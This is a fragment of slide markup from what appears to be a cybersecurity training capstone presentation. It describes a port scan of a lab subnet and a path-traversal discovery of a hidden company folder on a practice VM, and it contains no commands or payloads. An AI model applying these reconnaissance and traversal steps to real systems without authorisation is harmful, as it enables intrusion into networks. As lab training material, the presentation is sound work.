                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>of the victim network </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="300">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ports that were completely open</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>for accepting outside traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, and the services running on those ports.  </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136" name="Google Shape;1136;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419844" y="945478"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1137" name="Google Shape;1137;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21702" l="2035" r="35146" t="57865"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3683838" y="2722013"/>
            <a:ext cx="4758025" cy="1642575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1138" name="Google Shape;1138;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="95332" l="2035" r="37933" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3828775" y="1953150"/>
            <a:ext cx="4208450" cy="347301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1139" name="Google Shape;1139;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="17111" l="0" r="0" t="19440"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4981300" y="945476"/>
            <a:ext cx="1287150" cy="816650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140" name="Google Shape;114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144" name="Shape 1144"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;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100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposure via a Port Scan, continued</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146" name="Google Shape;1146;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="604854"/>
            <a:ext cx="9144000" cy="4359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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t> Results</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1147" name="Google Shape;1147;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This slide shows the complete results of the nmap scan of the subnet 192.168.1.0/24.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148" name="Google Shape;1148;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="66850" y="1040775"/>
            <a:ext cx="9144000" cy="3132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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1149" name="Google Shape;1149;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="41280" l="2037" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="259925" y="1183051"/>
            <a:ext cx="4367501" cy="2778750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1150" name="Google Shape;1150;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="2038" r="2714" t="57226"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4729250" y="1913925"/>
            <a:ext cx="4296075" cy="2047875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1151" name="Google Shape;1151;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2635800" y="1411650"/>
            <a:ext cx="1664700" cy="421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Hyper-V manager</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2609850" y="2798700"/>
            <a:ext cx="1019100" cy="421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ELK VM</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7034225" y="2939075"/>
            <a:ext cx="885900" cy="31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Kali VM</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1154" name="Google Shape;1154;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7100875" y="1884825"/>
            <a:ext cx="1276500" cy="364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Capstone VM</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1155" name="Google Shape;1155;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151"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="2500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1151"/>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1152"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1152"/>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1">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1154"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="1900"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1154"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav fmla="" tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav fmla="" tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6400"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn fill="hold" nodeType="afterEffect" presetClass="entr" presetID="2" presetSubtype="4">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1153"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="2500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11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59" name="Shape 1159"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160" name="Google Shape;116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Exploitation #2: Path Traversal to a Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Google Shape;116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162" name="Google Shape;1162;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457275" y="888650"/>
            <a:ext cx="3050100" cy="3746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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990550" y="765875"/>
            <a:ext cx="2429400" cy="1440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600">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The IP address was entered into a browser window in the Kali VM.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="945528"/>
            <a:ext cx="533372" cy="476605"/>
            <a:chOff x="457200" y="1452955"/>
            <a:chExt cx="695400" cy="621307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1165" name="Google Shape;1165;p65"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1452955"/>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66" name="Google Shape;1166;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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457156" y="1952465"/>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68" name="Google Shape;1168;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000575" y="1720525"/>
            <a:ext cx="2506800" cy="2452800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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lang="en" sz="1600">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>An index of the website’s public-facing directories appeared.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>All these links are clickable and contain information about the company and the employees.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="Google Shape;1169;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457169" y="2847153"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1170" name="Google Shape;1170;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2271350" y="3951775"/>
            <a:ext cx="990542" cy="476700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1171" name="Google Shape;1171;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="11959" l="0" r="16492" t="10430"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3723900" y="951725"/>
            <a:ext cx="4991099" cy="3546900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1172" name="Google Shape;117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76" name="Shape 1176"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177" name="Google Shape;117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100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation #2: Path Traversal, continued</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1178" name="Google Shape;1178;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2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The contents of two “meet_our_team” files</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>were very intriguing:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179" name="Google Shape;117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180" name="Google Shape;1180;p66"/>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     </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5375850" y="970125"/>
            <a:ext cx="3441950" cy="2000975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1182" name="Google Shape;1182;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303925" y="1590600"/>
            <a:ext cx="5003100" cy="1400700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="rnd"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ourier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Ashton … </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>I can’t believe </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>they </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> me managing the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>company_folders/secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>!”</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1157725" y="3407513"/>
            <a:ext cx="7387500" cy="10929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ourier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
